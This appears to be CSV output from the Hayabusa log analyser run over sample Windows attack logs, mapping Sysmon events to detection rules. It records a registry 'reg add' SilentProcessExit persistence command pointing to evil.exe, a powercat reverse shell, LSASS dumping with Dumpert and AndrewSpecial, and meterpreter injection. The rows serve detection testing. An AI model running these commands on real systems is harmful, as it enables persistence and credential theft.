SilentProcessExit hijack | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe\ReportingMode: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 2504 | PGUID: 365ABB72-6F61-5D0A-0000-0010DB351300,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:22:43.944 +00:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v MonitorProcess /d ""C:\windows\temp\evil.exe"" | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1956 | PGUID: 365ABB72-6F63-5D0A-0000-0010F93A1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:22:43.944 +00:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,GlobalFlags Registry Persistence Mechanisms,,rules/sigma/registry_sysmon/registry_set/registry_set_globalflags_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:22:45.694 +00:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence via SilentProcessExit hijack | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe\MonitorProcess: C:\windows\temp\evil.exe | Process: C:\Windows\system32\reg.exe | PID: 1956 | PGUID: 365ABB72-6F63-5D0A-0000-0010F93A1300,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:22:45.694 +00:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,GlobalFlags Registry Persistence Mechanisms,,rules/sigma/registry_sysmon/registry_set/registry_set_globalflags_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:22:55.397 +00:00,IEWIN7,1,info,,Process Created,"Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1352 | PGUID: 365ABB72-6F6F-5D0A-0000-001046451300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:22:58.944 +00:00,IEWIN7,1,info,,Process Created,"Cmd: C:\windows\temp\evil.exe | Process: C:\Windows\Temp\evil.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\werfault.exe"" -s -t 1340 -i 1352 -e 1352 -c 0 | LID: 0x134a4 | PID: 2112 | PGUID: 365ABB72-6F72-5D0A-0000-001004551300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:22:58.944 +00:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:23:01.928 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe | Process: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: taskeng.exe {9AAB3F76-4849-4F03-9560-B020B4D0233D} S-1-5-18:NT AUTHORITY\System:Service: | LID: 0x3e7 | PID: 1224 | PGUID: 365ABB72-6F75-5D0A-0000-001082611300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:23:01.990 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe | Process: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 272 | PGUID: 365ABB72-6F75-5D0A-0000-0010E5671300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:23:02.350 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe -check plugin | Process: C:\Windows\System32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe | User: IEWIN7\IEUser | Parent Cmd: taskeng.exe {CF661A9C-C1B0-45D5-BC80-11E48F3A0B96} S-1-5-21-3583694148-1414552638-2922671848-1000:IEWIN7\IEUser:Interactive:LUA[1] | LID: 0x134fc | PID: 3744 | PGUID: 365ABB72-6F76-5D0A-0000-001064701300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:23:10.334 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x134fc | PID: 2396 | PGUID: 365ABB72-6F7C-5D0A-0000-0010FE201400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:23:11.694 +00:00,IEWIN7,1,info,,Process Created,"Cmd: C:\windows\temp\evil.exe | Process: C:\Windows\Temp\evil.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\werfault.exe"" -s -t 3020 -i 2396 -e 2396 -c 0 | LID: 0x134fc | PID: 3800 | PGUID: 365ABB72-6F7F-5D0A-0000-0010B66E1400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:23:11.694 +00:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 08:07:42.331 +00:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\NETSTAT.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 1284 | Tgt PGUID: 365ABB72-3ECE-5D0B-0000-00107F7F1A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:42.331 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\NETSTAT.EXE"" -na | Process: C:\Windows\System32\NETSTAT.EXE | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 1284 | PGUID: 365ABB72-3ECE-5D0B-0000-00107F7F1A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:42.331 +00:00,IEWIN7,1,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:42.331 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:48.909 +00:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 888 | Tgt PGUID: 365ABB72-3ED4-5D0B-0000-00106C871A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:48.909 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 888 | PGUID: 365ABB72-3ED4-5D0B-0000-00106C871A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:48.909 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:48.925 +00:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 816 | Src PGUID: 365ABB72-3D05-5D0B-0000-001004220D00 | Tgt PID: 1440 | Tgt PGUID: 365ABB72-3ED4-5D0B-0000-0010B2871A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:48.925 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""cmd"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13529 | PID: 1440 | PGUID: 365ABB72-3ED4-5D0B-0000-0010B2871A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:48.925 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:50.378 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:4444 (IEWIN7) | Dst: 10.0.2.18:38208 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 816 | PGUID: 365ABB72-3D05-5D0B-0000-001004220D00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:52.956 +00:00,IEWIN7,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd"" | LID: 0x13529 | PID: 1476 | PGUID: 365ABB72-3ED8-5D0B-0000-0010398F1A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:52.956 +00:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation_sysmon/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:52.956 +00:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:58.816 +00:00,IEWIN7,1,info,,Process Created,"Cmd: systeminfo | Process: C:\Windows\System32\systeminfo.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd"" | LID: 0x13529 | PID: 3820 | PGUID: 365ABB72-3EDE-5D0B-0000-001032961A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-20 08:07:58.816 +00:00,IEWIN7,1,low,Disc,Suspicious Execution of Systeminfo,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_systeminfo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx +2019-06-21 07:35:37.185 +00:00,alice.insecurebank.local,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: Outflank-Dumpert.exe | Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 3572 | PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Hash: SHA1=3A41FF5A6CDEC8829876E0486A0072BC8D13DCF1,MD5=D4940C501545BCFD11D6DC75B5D0FEC9,SHA256=38879FE4AA25044DB241B093E6A1CF904BA9F4E999041C0CC039E2D5F7ABA044,IMPHASH=88788EE624180BE467F3C32F4720AA97",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:37.185 +00:00,alice.insecurebank.local,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:37.329 +00:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | PID: 3572 | PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:37.329 +00:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3572 | Src PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:37.329 +00:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:37.329 +00:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,rules/sigma/file_event/file_event_win_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:37.329 +00:00,alice.insecurebank.local,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/proc_access_win_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:37.377 +00:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3572 | Src PGUID: ECAD0485-88C9-5D0C-0000-0010348C1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:37.377 +00:00,alice.insecurebank.local,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,rules/sigma/process_access/proc_access_win_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:50.128 +00:00,alice.insecurebank.local,1,info,,Process Created,"Cmd: rundll32.exe .\Outflank-Dumpert-DLL.dll, Dump | Process: C:\Windows\System32\rundll32.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:50.259 +00:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Windows\system32\rundll32.exe | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:50.259 +00:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:50.259 +00:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:50.259 +00:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,rules/sigma/file_event/file_event_win_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:50.264 +00:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:50.729 +00:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Windows\Temp\dumpert.dmp | Process: C:\Windows\system32\rundll32.exe | PID: 1568 | PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:50.729 +00:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:50.729 +00:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:50.729 +00:00,alice.insecurebank.local,11,critical,CredAccess,Dumpert Process Dumper,,rules/sigma/file_event/file_event_win_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:35:50.749 +00:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Windows\system32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1568 | Src PGUID: ECAD0485-88D6-5D0C-0000-001007AA1D00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:36:50.450 +00:00,alice.insecurebank.local,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: AndrewSpecial.exe | Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf6a26 | PID: 3552 | PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Hash: SHA1=FE6BEB0E26F71F8587415507B318B161FBC3338B,MD5=4791C98C096587DB8DFECD5CA894DD56,SHA256=2969E70B74A12E3B0441D0BDA498322464A8614421B00321E889756D60AB4200,IMPHASH=40B5A4911712471B34D39C3AC7E99193",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:36:50.450 +00:00,alice.insecurebank.local,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:36:51.681 +00:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Users\administrator\Desktop\Andrew.dmp | Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | PID: 3552 | PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:36:51.681 +00:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3552 | Src PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:36:51.681 +00:00,alice.insecurebank.local,11,high,CredAccess,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-06-21 07:36:51.682 +00:00,alice.insecurebank.local,10,low,,Process Access,Src Process: C:\Users\administrator\Desktop\AndrewSpecial.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3552 | Src PGUID: ECAD0485-8912-5D0C-0000-0010FD2F1F00 | Tgt PID: 520 | Tgt PGUID: ECAD0485-822F-5D0C-0000-0010635E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx +2019-07-03 20:10:06.475 +00:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Lateral Movement - New Named Pipe added to NullSession | SetValue: HKLM\System\CurrentControlSet\services\LanmanServer\Parameters\NullSessionPipes: Binary Data | Process: C:\Windows\system32\reg.exe | PID: 3844 | PGUID: 365ABB72-0B9E-5D1D-0000-00100BF40D00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_add_new_namedpipe_tp_nullsession_registry_turla_like_ttp.evtx +2019-07-03 20:39:29.223 +00:00,IEWIN7,10,low,,Process Access,Src Process: ㄀ | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:29.223 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.129 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3092 | Src PGUID: 365ABB72-0C16-5D1D-0000-00108B721100 | Tgt PID: 1632 | Tgt PGUID: 365ABB72-1256-5D1D-0000-0010FB1A1B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.129 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx +2019-07-03 20:39:30.129 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx 